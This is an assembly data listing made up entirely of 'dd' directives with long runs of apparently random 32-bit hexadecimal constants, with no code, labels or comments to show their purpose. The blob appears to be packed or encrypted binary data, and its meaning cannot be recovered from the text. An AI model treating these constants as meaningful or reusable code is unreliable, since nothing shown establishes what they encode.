dd 0AFAF3D3Eh, 4F251613h, 0DB130EF1h, 1F33C9C3h, 3299A696h
dd 0E9432A8Ch, 43CEA3A4h, 9FD431BAh, 75081110h, 52EE40EFh
dd 0DCC7DF27h, 9D16AE1Eh, 0E0ED4B52h, 8C6C4F6Eh, 165DCF2Eh
dd 0AB7B8588h, 2356E4E3h, 25B13EDBh, 0ACF4241Ah, 14EEF3C2h
dd 0EC364E27h, 131ED858h, 0AA1F00E3h, 2E87A75Fh, 1232D2B6h
dd 0C99084A4h, 53FCD76Bh, 0AAB7C8C5h, 0F76ADD6Dh, 0EF441B85h
dd 0BD499AD0h, 0BCC2322Fh, 0DAFACB04h, 0AAF402D1h, 0AD48A395h
dd 0E90DF14Ch, 0DC6795A7h, 36A89CC5h, 91766E23h, 0EB77056Bh
dd 14920A55h, 0F022D0E5h, 0D60E80EDh, 0D7BA705Ch, 0FB548A02h
dd 82972541h, 0E8F115AFh, 0D44FB319h, 4AA45E30h, 27688EE0h
dd 0A45AE885h, 0D7DF1240h, 0E9A62CAh, 8169C7D9h, 373BD709h
dd 931F912Eh, 0EDCC8A05h, 0FED4524Fh, 0A22EB4ACh, 597AF89Fh
dd 46E49FEFh, 34B3CCF8h, 0BA93325h, 0F07E6182h, 0C07DC285h
dd 5B3DC960h, 9D02A0A0h, 0D05CEAF1h, 41D82A0Eh, 0F741EFE9h
dd 8C028F9Eh, 6CA33337h, 0F055C2CDh, 102B0946h, 79FDBDF4h
dd 79B537BBh, 0AE8B293Dh, 32C61E24h, 26D53135h, 889B1909h
dd 5880DCBFh, 944DB74Fh, 767EB362h, 66ECC08Fh, 815EECE9h
dd 4EDC0321h, 0F543C6EBh, 8E048D90h, 3CAD3131h, 4AB74FF8h
dd 7A7D3B22h, 1D8E30A7h, 596596EDh, 30A1628Dh, 4A23F672h
dd 78D4309Bh, 659C1A0Ch, 96F4EE81h, 0F47CDB4Eh, 1F838036h
dd 52929390h, 0F053640Ah, 0BB451F12h, 89248EF1h, 41ED0AC8h
dd 3EF97BBBh, 6674E5B0h, 0C352599Eh, 3919E265h, 56B087E3h
dd 0FD606E1Eh, 36E05200h, 4868BACEh, 21B166BCh, 1F370083h
dd 33B94C01h, 13AC3A3Ch, 4BE5055Bh, 0FA8D6BD4h, 18CE4978h
dd 9BF56223h, 0B23FFDFDh, 109B0E08h, 0EDBE1E2h, 0F54F26F0h
dd 3B83A8E2h, 8E403DCEh, 0E90A9214h, 0B6E9475Ah, 46BC2CBCh
dd 0DE0BD378h, 86F8B6AEh, 0E0966147h, 75AD3B3Bh, 56CA006Bh
dd 4D9EEFDFh, 328C6187h, 72EC4A4Dh, 0E870FE00h, 7191595Ah
dd 0CC74E27Dh, 0F781665Eh, 9550696Dh, 0A05F9392h, 0C5C2DA95h
dd 349C1D2Eh, 44A43AD2h, 8012D2D2h, 6FC992CBh, 9A02B0B3h
dd 0F7FA9C3h, 0BB8B96A6h, 25E933D1h, 34E51314h, 8F1785F2h
dd 0E97210A3h, 43CD5B5Ah, 9E27B5B5h, 0F8821010h, 0AD8E3D3Bh
dd 9D1C1C51h, 0ABCB8B1Fh, 9A99BAFDh, 0E0853A31h, 73D24E6Ch
dd 1596E8C6h, 0A137AC86h, 56C45D58h, 0E36FCBCBh, 0A90DA486h
dd 59BF3839h, 0F36BD3D4h, 86747663h, 28BD292Fh, 0DC29D9D3h
dd 8DE57763h, 3FB62B0Eh, 0ED3986A0h, 7CF54752h, 0E873A1Fh
dd 0CD299BB1h, 70CD585Fh, 3BE8BC8h, 0A9238486h, 45DD326Eh
dd 0C07FE9FDh, 0B914B7F3h, 64A43B2Fh, 0E574C4CDh, 991E5066h
dd 45B53E38h, 0C14ECBF4h, 92D27166h, 30800A1Eh, 0CA498AC6h
dd 5DF35040h, 0B9C1114h, 8D3AB4B0h, 79CB6002h, 1D97FEFAh
dd 0B51CE790h, 4FE03656h, 0E66FF9EBh, 0A90DB1F4h, 52AF3809h
dd 0E069DFE8h, 980D646Dh, 4692123Bh, 0E759DEFFh, 0A8ED7A7Ah
dd 55860B04h, 0F649AE80h, 5EFD4A4Bh, 6497ED15h, 0F238BF91h
dd 75D2515Eh, 1868C9EEh, 0A23AA783h, 6EB60524h, 0EB5DEAFEh
dd 0BA068D92h, 5DAB3219h, 945EC8C7h, 0BD0E6D41h, 2DA11019h
dd 0D146F9D7h, 92FE7B70h, 57A40A1Dh, 0E64BA88Eh, 4AEA4541h
dd 2891EE17h, 802BB1B9h, 6FCC7033h, 66EF4D9h, 0B9298AB8h
dd 4EFF4602h, 0F477F6E9h, 8F03938Bh, 4FA21253h, 0E553CAFBh
dd 0B5126561h, 0DD7241Ah, 0CA67CBD9h, 9AE16F7Bh, 36811B38h
dd 0C020A2B9h, 4FF2454Fh, 1C93C380h, 0A73EB78Dh, 59D84E5Ah
dd 1B60E1E6h, 0AA2D829Eh, 42D60F45h, 0C978C3FDh, 80019096h
dd 5CA61B55h, 0FA4AFDCBh, 8B0C6D78h, 2D946725h, 0C25A97CEh
dd 47E8536Eh, 5B8D1A1Ah, 0D827A082h, 75F1426Eh, 1A87E4CFh
dd 8436B1B5h, 7ADC7537h, 1574C4FFh, 0A6138B8Fh, 40C91947h
dd 0F966C6C2h, 8C29CFCFh, 3FBE2B25h, 0F94BC0E1h, 0C70C7E69h
dd 36BF2654h, 0CC66C2B4h, 6AC9797Ah, 0EE91219h, 0D105A5AAh
dd 66DF4946h, 0E91F4F0h, 0B43794ABh, 44FE3B78h, 106ED3E7h
dd 0BE0EBF8Bh, 43D93E27h, 0F873F7A3h, 821C97B8h, 24A6300Dh
dd 0F949E0B3h, 0A3807E6Bh, 20BA0406h, 0DC50AA94h, 6CD67852h
dd 9EA1D1Bh, 0CF30A0B8h, 78DE414Dh, 6E9AE8EAh, 0BD3A93B7h
dd 4FC77A5Eh, 0A4696F0h, 0AC0894B1h, 41ED3F38h, 0E27ED3CCh
dd 9B176765h, 27A6340Eh, 0E969B5DAh, 96E7624Ch, 389B0E1Dh
dd 0E237A0AFh, 63E0636Ah, 30890E19h, 0DE25BBA0h, 5BA15C5Eh
dd 0A89CAF3h, 9A309780h, 41D3514Eh, 74FEBE5h, 9910BCF1h
dd 40DE283Eh, 0EC7CF4C3h, 871B6B75h, 0EBB135Bh, 0F77FC7D4h
dd 9ECB6575h, 26BC0839h, 0AD57A8ADh, 77DB5651h, 8A8121Ch
dd 0F248B3BFh, 73D37E5Ah, 1F8FDBE6h, 0B8248081h, 40D92F69h
dd 0F4429AF9h, 0B50384BDh, 41A22A1Eh, 9075C6CEh, 9826704Ch
dd 27B42B33h, 0ED42EFC2h, 95E76165h, 3C8C0A26h, 0E03BB0B7h
dd 6DE37554h, 1BA30708h, 0D02FACA7h, 78C35D66h, 59EE0FBh
dd 0CC37888Ah, 54E33670h, 0D76BE8F1h, 0A91C849Ah, 538E3D2Fh
dd 0E86FC4C5h, 870C5403h, 26BA0F08h, 0F348DFD8h, 94E16466h
dd 158C250Bh, 0FC54B8A8h, 67F15455h, 30A5801Ch, 0DF388994h
dd 68D24142h, 1C6DEC8Ah, 0A1288C96h, 5CD32F23h, 0ED7FFD9Ah
dd 0AA099D9Bh, 4CA03450h
dd 0E76CC2C2h, 8C147167h, 35D50632h, 0A259DEDCh, 98E47D67h
dd 358A006Eh, 0B14BA8A3h, 6EEE466Ah, 1191EC0Fh, 0B321B094h
dd 74C87F57h, 7566FDE8h, 0B52985AEh, 5EDD2830h, 0C666C5DBh
dd 85029498h, 5EA22131h, 0E140DBFFh, 81350A62h, 27A50015h
dd 0D47ECBDEh, 0FECD7473h, 3D931B39h, 0C724A1B8h, 63F95A6Ah
dd 269AF62Ah, 0B63E97D9h, 79C54B51h, 1660C1FAh, 0BE36AB8Dh
dd 68FB4821h, 0CE44E3C8h, 0A640CECAh, 6EC91B18h, 0FB60D6CBh
dd 0BA1B7F66h, 19D91E06h, 0D67CA6D8h, 65C5727Dh, 1B90330Bh
dd 0D22782CCh, 7DF85E76h, 596D3F8h, 0BC14BAAEh, 7BFE3A77h
dd 0D63C7F7h, 0A10C8FBDh, 6FC30C23h, 8CFC20A0h, 8C3E35D0h
dd 0D6CA5856h, 9A00FE3Dh, 0F6150D61h, 27893834h, 0F8F849BAh
dd 56DFC991h, 0EB8371Eh, 2AD62E9Dh, 929E1C05h, 0FE078A47h
dd 0C662CC78h, 0E3A5FFBBh, 0D28218C5h, 0E561DFF8h, 30D61AB7h
dd 1EE9AAC8h, 0E640D2B4h, 0C4C499DDh, 9B25B322h, 95D4665Dh
dd 9B506967h, 66BEC3ABh, 4F85E76h, 34EA6876h, 0B92E80D2h
dd 13FF7943h, 3CF9ED85h, 5DACB18Ch, 229E10B7h, 0E8F7CFCBh
dd 0D852DB22h, 6EC9B4CFh, 9897282Fh, 0E492FFCFh, 52CCCFD7h
dd 4C25B484h, 257E5C58h, 7DA1EFE2h, 23BBC4F3h, 6910426h
dd 9F142D90h, 2AC0582Dh, 98A01E01h, 6FE10D08h, 35170AE1h
dd 0A124C2C3h, 7F39BB17h, 0C1EF7E7Ch, 6564C4Ch, 4E75959h
dd 0D95F8484h, 370ED95Bh, 7A73BBEh, 1083110Bh, 0AD219377h
dd 6E67014Fh, 793C94Ah, 0E0B07B79h, 8C5D533Eh, 9B6B032Eh
dd 40DC6A0Dh, 9A02B5E2h, 74E06F6Ch, 0AC0A0C68h, 0DFE2F3C2h
dd 0F855B169h, 0CD1A988Ch, 0BF7507C0h, 44D05EB4h, 72ABE5B6h
dd 0F9B509A4h, 0C66D9101h, 0AE0AD245h, 28587170h, 62C57D5Eh
dd 0DB451357h, 0D62B7E8h, 51338CB9h, 0D6906324h, 2697410Eh
dd 42509BB2h, 0DD0DF499h, 453D63B1h, 140955ACh, 838771C3h
dd 45D26056h, 0A3776A3Ch, 4F0A2942h, 54D26A88h, 0AE30704Dh
dd 831C2521h, 63F17E73h, 756021D6h, 0EB6DBF50h, 7674EF2Ch
dd 25AF0AA2h, 2772C082h, 0D0DB16CDh, 8A393B7Eh, 6A95123Ah
dd 6E153C0h, 0ED492B98h, 0CCD8A6DCh, 9202B52Ch, 7F5E3C14h
dd 51237584h, 0B1D6CCA2h, 0C89A70AAh, 49041414h, 4448DBE7h
dd 0DA9B3E3Ah, 0FC1820CEh, 0E0701D72h, 0A755B242h, 7BBBFEDEh
dd 238A8C3Eh, 3AC6BC07h, 147DAEACh, 0DF607FEAh, 0B24BEF61h
dd 27308E97h, 0FE833D6Ah, 585FF07Fh, 5FC1CECAh, 0D9B2B2Dh
dd 66F1EB2Bh, 57B0DDD9h, 1C9A141Dh, 0F3896E05h, 0D25FE8CDh
dd 2CD31744h, 8713A576h, 0B63FADF9h, 0A9370154h, 97129C8Bh
dd 66F0C23Ah, 4BD86767h, 0A45891ECh, 688C7149h, 1AE77572h
dd 44D4309Eh, 999C1A0Ch, 32827204h, 0C0388A8Bh, 49AB3937h
dd 5921276Fh, 2B5FEDE9h, 1E9691D3h, 4991FBA0h, 0F08DEA8Fh
dd 541DDC06h, 0CE72E3B0h, 86EBF35Dh, 14D95749h, 7846013Ah
dd 0CF1BE34Ch, 0D1E8465Fh, 0E0109499h, 9CC56F43h, 6BF68114h
dd 66274DDh, 0D3F52A52h, 2B56C439h, 8630BEBDh, 0C92EB61Ah
dd 0A159389h, 0E66DF539h, 64BEA758h, 52B14DBAh, 0A67F3D21h
dd 6313FD98h, 6869C2F1h, 3A0F1D18h, 18E8027Ch, 0AC3F5C5Bh
dd 0A7D2C1Bh, 7DF81308h, 1951E0EFh, 0A67FC46Ch, 828F9A54h
dd 0D761EFEFh, 32BCBACEh, 0B72824A4h, 6836EE8Ah, 0C6C45964h
dd 9D25B355h, 82A0308Fh, 6F5A2F98h, 0EB7B8A93h, 0C91B3C6Bh
dd 2FEB3EBEh, 0D1151CF9h, 46C97C2Dh, 43381278h, 0F10AE1D1h
dd 9B2B33FDh, 96089696h, 0DA62F040h, 66ED75CDh, 0A18F3EFh
dd 0E97200A4h, 0EFC59DD8h, 1A28B889h, 0F8821089h, 0A1A84B56h
dd 0A20DF968h, 792AC9Ah, 41E1D779h, 8166F4F3h, 62C4480Fh
dd 4C57F6FDh, 4A2996C2h, 4D90C143h, 0F17FECE3h, 0AB678C73h
dd 40906277h, 6F5E61CFh, 50450D02h, 44CF7A4Ch, 607B5541h
dd 0C9A87B84h, 31F5E6Bh, 46699795h, 8942229h, 0C99133Eh
dd 0D929B9B8h, 0C636CE2Fh, 0F4FDBBA5h, 0FF619123h, 0DD37C9F7h
dd 0D00CAAB4h, 0DC65F49Bh, 60901ECAh, 448E56F8h, 6676342Fh
dd 75CA2FC8h, 6918E9B7h, 0A8D64546h, 0C11E3E3Dh, 0AF0BE5C7h
dd 0F6B220A6h, 53DBB3EEh, 3E8920D5h, 28B05CBDh, 0B1068C8Ah
dd 0C97DBB6Fh, 27B442D7h, 6F8FC199h, 0DD58EB89h, 780ECC4h
dd 2796AB99h, 0EC48364Fh, 0CB589A5Dh, 0A11D8BFFh, 7E03B3E0h
dd 55D3412Eh, 80025E4Ch, 8F9B2612h, 64C2B04Bh, 3724D85Fh
dd 0E6A73522h, 442DE61Eh, 939202E6h, 40C02105h, 0D44CFBF8h
dd 0B619819Eh, 74A93232h, 0E670C0CEh, 3C49087Fh, 0BE87ACEBh
dd 42ACEF63h, 0FECA7216h, 3DB72496h, 98A40D1h, 0B59A1839h
dd 66F48269h, 3F03D855h, 7D56C8CCh, 3B071C26h, 0D15DEBE8h
dd 6C35ED25h, 62200B99h, 3C79C54h, 852D8A8h, 0C2219F9Dh
dd 0F2E0C62h, 7AFBFCF7h, 814534BCh, 0E748991Fh, 0DCE8B5F4h
dd 0B441CE6Eh, 2EF42A4Ch, 3EF68481h, 56AFD5B0h, 1D9B1594h
dd 0F309CD04h, 4ED6FDA4h, 2D8A7872h, 0B82F2F16h, 0EFFCCAh
dd 3236A755h, 9849E2FEh, 47810A60h, 4CE95757h, 8B765441h
dd 0FEDE1C29h, 6BD845C6h, 7BD72FCDh, 489D1B03h, 65644507h
dd 0C5508B58h, 242D5C37h, 7672CEDCh, 0B8F511BFh, 0C6BB796Bh
dd 8A15A2E0h, 0E5A74371h, 88C55857h, 0EEA9ACFFh, 0F017123Dh
dd 19DA6867h, 8515573Fh, 54D91D2Bh, 7600E28Ah, 0FBC8D1FFh
dd 995D2F16h, 0BFFBFED4h, 4C729255h, 15202373h, 7FAAC4A0h
dd 0D6196E2Dh, 43D9192Ch, 7EF4A1D7h, 0CEDD15A7h, 33407D55h
dd 6F26EA97h, 0F99C5C85h, 53956DDFh, 29014811h, 4B1BED1Eh
dd 605FF17Fh, 3144E2E1h, 232A161Ah, 1CF9B7B6h, 0FEE6CA63h
dd 18AE0C0Bh, 4E38AD20h, 0A8E1FFF0h, 42B4B4h, 0CDA22C65h
dd 61723030h, 72FD1CD7h, 0F777E5B4h, 0F6E8400Ch, 51DD6B01h
dd 29C89243h, 6A23566h, 4B1DEF87h, 36B9D4E2h, 15913A55h
dd 60047104h, 35AAD865h, 1735B7C3h, 150AA8A6h, 8C6498F1h
dd 552AB21Ch, 419978Ah, 0D9444584h, 412F9C5Bh, 9E43E7E5h
dd 0D4B987EFh, 0D7566D5Ah, 0AD09F78Fh, 7FEF694h, 31DC832Bh
dd 8C7B632Ch, 835C311Eh, 70CDA7D1h, 0FB646069h, 213B400Dh
dd 4D9965B3h, 5066C4D9h, 804A731Eh, 902B99ECh, 0DE6C5089h
dd 0D1FAA1D7h, 9F1B8981h, 0C9C1999Ah, 784C6F5Bh, 54D96207h
dd 15E2A1ADh, 33A17E4Ah, 0EC1B8887h, 3BA4A6D0h, 8EAF8DB9h
dd 0FC722A76h, 5591813Eh, 0E434B6A2h, 0B00A979Dh, 76F9352Bh
dd 0FD78C3DBh, 0C54A356Fh, 69BF0D39h, 0F32D8A9Ah, 0BFDC454Bh
dd 21A02D21h, 0C158B9B4h, 67F76555h, 0F9DF20Fh, 0E238BF86h
dd 6ED55063h, 64ECE3h, 0AF33BAB9h, 69D22132h, 0F075FDF9h
dd 0BF3AA486h, 5DA83222h, 0E06DC8DEh, 9F134E59h, 2BB4143Ah
dd 0CE40EDD5h, 0A0F37B7Dh, 3884073Dh, 0D54DACACh, 6DF55A73h
dd 3991EE14h, 0A83AA996h, 60C0455Dh, 542F5E9h, 0B3348797h
dd 45D13223h, 0C94ED3F2h, 0E018899Eh, 6E811A01h, 0D073EEFBh
dd 8C15475Bh, 26A40A13h, 0F36DCBDDh, 91E8747Fh, 1BBB0607h
dd 0D633BDBFh, 68CA5E4Bh, 89FF70Dh, 0BA1582B7h, 6EC45544h
dd 2305E1EBh, 0B7389F88h, 5FD50030h, 8716A2EAh, 0E26EACF9h
dd 4EB95754h, 0FA4AC9C1h, 9A0A6227h, 3BB50911h, 0C85AEFDCh
dd 4E8E737Eh, 7AA3353Bh, 0C63AAAAAh, 6DFE4444h, 2CA4D08Bh
dd 8E2BFF89h, 3EE27379h
dd 0B6FE2B6h, 0DE539B9Fh, 2EBBA113h, 848A3A0h, 0D44F1B16h
dd 514F9E56h, 992482A5h, 0DF5298F4h, 0A51B6855h, 0C265B6A0h
dd 0E33A9604h, 5E9475Fh, 0C26DED62h, 2F1F4A03h, 488D9B7Ch
dd 0EAA35D50h, 56263B08h, 1DA2C290h, 0D8E46248h, 0BFBC7A63h
dd 0BB3D9027h, 0A0F904FDh, 0BE85D5A2h, 79240249h, 0A3583C2h
dd 27DB594Bh, 0AA35C2C5h, 3D05E14Ah, 0B7EA485Ah, 0B944D259h
dd 636A8A6h, 7A987B5h, 375D8BDFh, 128275AFh, 59741594h
dd 0A917F4E7h, 32BD43A2h, 0CE51F6A4h, 0A43DBBD1h, 5F59A55Ah
dd 96268498h, 9D957BCFh, 39343A6Bh, 53C93B3Ah, 36BAC68Bh
dd 142BFC78h, 53952CD0h, 15A02E26h, 30B9CED4h, 8E7AB1AEh
dd 0DBAF7170h, 4F258A03h, 232219F1h, 8133B3B3h, 8F288A59h
dd 0E9720569h, 0D6310A5Bh, 9E189A94h, 0F8831CF8h, 9A306Ah
dd 0FF7D908Dh, 53D67D4Ch, 9EBB7B3Ah, 8C6C3C46h, 16A5D82Eh
dd 38A08A88h, 9802B7ADh, 0B04E693Dh, 803BB27Eh, 8A343AC1h
dd 5F914D27h, 901AC0A6h, 15234302h, 74FBAFC9h, 60D23BB6h
dd 74D53065h, 63CC91FEh, 35B745C5h, 62951307h, 78872F7Ah
dd 0EC49D7D4h, 6231CD7Fh, 8EFEBCA5h, 0FC732B76h, 26B8A93Eh
dd 0D2589B98h, 0EE54A7B6h, 7A8E1460h, 0D08955A8h, 377352Fh
dd 45D26057h, 0D25CC9C0h, 9CF37B7Bh, 0ABB2702Dh, 9F171353h
dd 0EC12AC21h, 6CF14F50h, 0ECC654E4h, 91A60429h, 432C790Fh
dd 5BA5B9E5h, 28856F01h, 830BF509h, 6BE4F7F5h, 38F44B0Fh
dd 4EA321F3h, 5793729h, 0B82B90A3h, 6AB7BDFh, 0FC892734h
dd 0F041F13Eh, 0B13EFCE8h, 2BFDB2AEh, 31A3814Dh, 0C027DABDh
dd 1AAA5E60h, 0E0FD108Ch, 0D06CC606h, 5FED85C7h, 129C12BEh
dd 0B26BC9D7h, 8F4B5238h, 95108E08h, 0BF2B5F53h, 0DC293630h
dd 0A400925Eh, 231EE64Eh, 9EE6445Ch, 836E304Fh, 63732925h
dd 980A7C8Dh, 0F25DA054h, 502FFF34h, 2104A29Bh, 3A6DB3BDh
dd 0D346B51Dh, 925F2459h, 0B63BFBC9h, 7620620Bh, 50DD4F5Ch
dd 0C168478Ch, 14A03063h, 54092889h, 854AE4E7h, 5AD7603Eh
dd 0E137AA9Ah, 8A11E314h, 69C6B4CEh, 95018F8Ah, 4FFA6866h
dd 5530066Fh, 41A0EDDBh, 2E8A646Bh, 0FC0B4A61h, 0E462148Fh
dd 769A5756h, 0C962E6FCh, 0BF3A2242h, 0D8266729h, 0A803EDFEh
dd 28E10F2h, 0FA02574h, 0D614A4ABh, 50F85E45h, 0FE08D583h
dd 0C661F404h, 0DF19B7ABh, 1306A4BEh, 0D660EE25h, 0CFBB231Eh
dd 0BB39BA37h, 34FA70FDh, 0CDCA6847h, 0AB09750Fh, 0A22D5B0Dh
dd 643FFD98h, 6EB7C2F1h, 0EB1A9010h, 0EE94769h, 0EF42BB87h
dd 139C4479h, 0BE070685h, 37A8FD37h, 1010B8C5h, 7D07A581h
dd 5009E49Bh, 0CDBC4A59h, 0BD3ACD31h, 0E87C16FFh, 119C595Ah
dd 0AE6EF0FBh, 0BBC4203Dh, 0C4246925h, 0AC05EF82h, 697768Dh
dd 0D5677878h, 0BB74CA64h, 0B822A074h, 87F9B7ABh, 35AC106Dh
dd 24AE30D4h, 3141C196h, 8E27BEB8h, 78F10F62h, 0CE825AA6h
dd 6C72302Dh, 7649549Bh, 0D27B5B7h, 0F8821578h, 0A668E66Ah
dd 0F437F5DCh, 2B5B9D92h, 34047A49h, 3FB92B22h, 268DE293h
dd 0F4F48988h, 0CB55E1F2h, 2420D2BCh, 0E85E9897h, 0DB64F3F3h
dd 1912D8B2h, 5498A797h, 0EA740392h, 2E1BD60Ch, 0AD6E5B6h
dd 0F9B43EDCh, 2686ADEEh, 0BDB1AFC8h, 9D6B2220h, 62DE5013h
dd 0CB343Fh, 17931189h, 0FCD4FE89h, 0FC774F66h, 0B34D103Eh
dd 813CB621h, 58693476h, 36C14EC7h, 1A17E923h, 6446FB03h
dd 75F1F9D8h, 5EAE7FB7h, 0FB86243Ch, 558B6F06h, 3AC4CBACh
dd 9A608E4h, 6C0F86F8h, 0BE4BB851h, 8D28A030h, 72CFAD28h
dd 9E0BF78Eh, 0B01D7C0h, 428B9CA9h, 0DC2873FBh, 8A4E514Fh
dd 922D8B6Dh, 9D900EB5h, 2E2C9EA8h, 0A12DBB2Ch, 726E3D4Dh
dd 0AAB75559h, 8011FA52h, 0D825AB22h, 0D5F2B05Ch, 491E32D7h
dd 8C2ACACEh, 7431AF34h, 0DB33E98Ch, 7BB64441h, 458561C8h
dd 526AC8DAh, 0B4D17715h, 0A42FE23Eh, 58755806h, 6C91E86Ah
dd 0ABCF7CAEh, 0EF8B5217h, 1DF77125h, 967BC6CAh, 37BA82Ch
dd 37FC62BFh, 0D16A98D3h, 96F905CCh, 462F6E30h, 0D14103E8h
dd 59D4643h, 0A832D8ABh, 0DB4CD4D8h, 15E27076h, 0EE04D795h
dd 0FA0F2F28h, 49E2A28h, 5A66BF9Ch, 0CFA7FF82h, 0F523F471h
dd 0DE41CFCBh, 5DCB7A26h, 4437117Fh, 4EDBDEEAh, 1D9B2C07h
dd 63E693E5h, 82522481h, 2DBA4DADh, 0EC31849Fh, 1C39FCF0h
dd 0DE2B2C0h, 94E732AFh, 9A75E75Ah, 4CD9676Ch, 87EB7C33h
dd 52D91C29h, 7729E38Ch, 76C7D0FDh, 0A5107F56h, 6AC7A97Dh
dd 0D0637A5Fh, 92AC3A07h, 4A286A1Ch, 0BFAEC5ECh, 7CED1847h
dd 0A6A8365Eh, 1DECFDCCh, 0AEE52657h, 2FA94C3Ah, 0F44F21F3h
dd 0E02865D6h, 4154D2B5h, 0FC70EB41h, 0BEFE0514h, 0B9345CC6h
dd 0DD15C6C1h, 0D17548AFh, 0C762CC21h, 0D62A9FCAh, 83542C78h
dd 0E74D5E7Bh, 5E01CA49h, 8D1694B6h, 0D718D48Ah, 0BECB592Ch
dd 0AC09DA26h, 83D8E0Eh, 50DB5946h, 2EF2D2B6h, 5A03EBBh
dd 5FEA7877h, 94BA5717h, 0FD9F2D1Ch, 9106798Eh, 0C95723BDh
dd 0D5189B6h, 815E96A5h, 0E94EFD65h, 0CC45C84Bh, 8EAC21AAh
dd 6DFB0000h, 42FD6B59h, 6271B5DEh, 0C7AE4D9Ah, 5E1DEE69h
dd 0AC376147h, 56520B1Eh, 30EF1028h, 0BB2ED5B8h, 43612F2Dh
dd 440A1C78h, 32D6E3D1h, 163431C3h, 0F60A9892h, 0EA54F574h
dd 3F32C04Ch, 2199796h, 0D9441194h, 299D0C5Bh, 0BD6E7B5h
dd 0F8B43E05h, 5D2095E9h, 0AD3DC740h, 0F894481Fh, 51DE7BCCh
dd 0ADDD29D3h, 95A30102h, 0F4F27470h, 0CB57E60Bh, 15A9C5B4h
dd 493F9AA7h, 8B3737F1h, 64C5251Ch, 0A01C1C58h, 7F890432h
dd 44E174A9h, 1B247933h, 0F98617D4h, 0D668A658h, 0AE0BF9DAh
dd 60C77571h, 62FF7E65h, 0F8DF2784h, 92A50303h, 0F7B8249h
dd 4559E7E0h, 168461BBh, 0CA855F98h, 0BC3B4ECBh, 0E4F0514Eh
dd 60EA6AABh, 6EF1E7F4h, 45E35172h, 1811F03Ch, 0FA880DDEh
dd 95E0A35Fh, 4ECA3A31h, 39BFA3A8h, 6C31804Bh, 474A9162h
dd 4B2A03D3h, 30B68092h, 878BEAF1h, 2B9E852Bh, 0DC2A1F4Ah
dd 27049182h, 0BB8C4D24h, 0E11EA1D0h, 0D13183DAh, 44C121D4h
dd 0E6A2ADFBh, 257DE75Ch, 0D3DEB24Dh, 0B10FFDD3h, 4F1171E0h
dd 0ED7D8E59h, 0C04EDC6Fh, 2B6AF701h, 452DA6BEh, 0E173DBC9h
dd 61CC0862h, 0F57ECEEEh, 8E05D496h, 30CA3A34h, 0F348938Fh
dd 8A116B75h, 2AA51641h, 0D0599D86h, 0D1B66A62h, 13933B5Fh
dd 0C32DA1B8h, 63F50444h, 15D9EB19h, 0AB6FF1BAh, 3C890809h
dd 361FAF9h, 0F26ED081h, 4BD32D2Ch, 0B629D6F6h, 9B1A8FD9h
dd 1EF43238h, 0F351DECCh, 0C1447E6Ch, 64E55941h, 0C741A7D4h
dd 0DB07975h, 0D116FD78h, 8572CB41h, 8CD39B27h, 0C7058168h
dd 0FBD0D6AEh, 70DE7142h, 0F2C560E5h, 0CFED6515h, 9EBB7976h
dd 8CFC209Ch, 0A1A5309h, 4BE567D6h, 98633947h, 2CA0D22Eh
dd 29855BAh, 40419BFBh, 0EA713655h, 5CE97558h, 0B74389A6h
dd 0E0767729h, 1F07797Eh, 0DDDF6BFDh, 0ADAD0B08h, 0B42C94A6h
dd 0E55D62A3h, 0B718B9B5h, 8A68297Bh, 0C1C54B70h, 0B3375968h
dd 54AE7016h, 480D05E6h, 4FEB4798h, 99EA483Dh, 65ACB2D5h
dd 24D67E04h, 9968D0A7h, 67C31181h, 19D7BB69h, 0BD53DD02h
dd 0A993DFD2h, 2E8D5095h, 0D862C0DFh, 77E50E77h, 0B025D1A4h
dd 0E823BCACh, 0BDE9712Eh, 0A0264B4Bh, 0F7CC5B47h, 1E1781Dh
dd 0D836948Bh, 55D02215h
dd 0E5E47928h, 44BA2D93h, 25F3ABD3h, 5C1188B7h, 35AA7D08h
dd 19ACB6C3h, 3C47DEC1h, 244475FEh, 6383B3B3h, 8056F3E5h
dd 168D1D85h, 9961A4h, 1A278486h, 77CEF01h, 68D3C57h, 0ABBCC98Bh
dd 346CDEE1h, 9CC393A2h, 38482A2Ch, 0E95DCDD7h, 661458BBh
dd 2356E4E2h, 0DA4EC164h, 800B997Fh, 36E4AEF2h, 35F06774h
dd 901B9A4Eh, 0D88A6702h, 74F3EBD7h, 164EB886h, 0AA389333h
dd 52E05E5Bh, 0D2C2B0h, 0E16ADCDEh, 62EF7C69h, 0F07756B2h
dd 1F213D75h, 0FAFE8C88h, 125BDABDh, 7688C058h, 798894DDh
dd 2B67F5F3h, 16C2460Dh, 1413AAA8h, 0EB7705E8h, 478E23ABh
dd 0A0CD3EB8h, 84061512h, 74C2504Ch, 7BB8C5E6h, 0E1972521h
dd 9C0E82DCh, 0BE825BDAh, 5A2D3430h, 634A0582h, 0CA2929CEh
dd 2D5E8373h, 0C9865599h, 0F5EC7EE5h, 0D0C46260h, 6CE151FCh
dd 0ED79A8EDh, 6049E95Fh, 0A12E8C89h, 0CCB93C89h, 0AA8A9A6Eh
dd 35313337h, 0B9927ACh, 55D034F6h, 9EC6DBE7h, 0F276350Eh
dd 8AFD6DDBh, 9ADD9795h, 2AB72566h, 0D3EF147Ch, 6D7F83F4h
dd 0AD654E7h, 855AADACh, 0EF7DFABEh, 0EC253361h, 0A6D3BF0Ah
dd 0A0D4BDE5h, 0CAD77B22h, 0B3C24947h, 84FD2925h, 980A18EFh
dd 279F3526h, 97F0C7CBh, 3D079EC4h, 0D41F61F9h, 0A591046Fh
dd 8713FE19h, 0C22B3CF9h, 1CE87674h, 1C0AFB27h, 74F61B43h
dd 4BE85644h, 0D53A8A84h, 8C7921Bh, 0D9F73773h, 3E4197AFh
dd 3FAC05A2h, 61B48581h, 0F7009DDAh, 3C205DE4h, 21071CF4h
dd 0E4585068h, 21BA4876h, 76E83624h, 0C7DB0304h, 0C1C96766h
dd 0A90FDC25h, 0ECCBF30Bh, 0B2D95755h, 98180C2Ah, 903911Ah
dd 0D1E84644h, 8772C35Bh, 7BCF7A29h, 6C427A83h, 3951EFEDh
dd 10805FADh, 7CB36B92h, 2960DEDDh, 9084DDh, 74A02EA2h
dd 196FCDD3h, 70FA5BEDh, 0EDBE4B2h, 0F54F2150h, 7FDDCDE4h
dd 6934C2F1h, 48F1DF4h, 5F832A76h, 93AE3C51h, 0E3C62C1Bh
dd 157D478Ah, 4D52D0CAh, 0EA2EF8FAh, 0BC08656Bh, 0E874976Ah
dd 2281894Ah, 0F8168EA4h, 94F198E3h, 33A7557Eh, 7545A0C1h
dd 87FF1CBh, 0A336C1Ch, 44CA3C3Eh, 0F96FE1CCh, 4D155619h
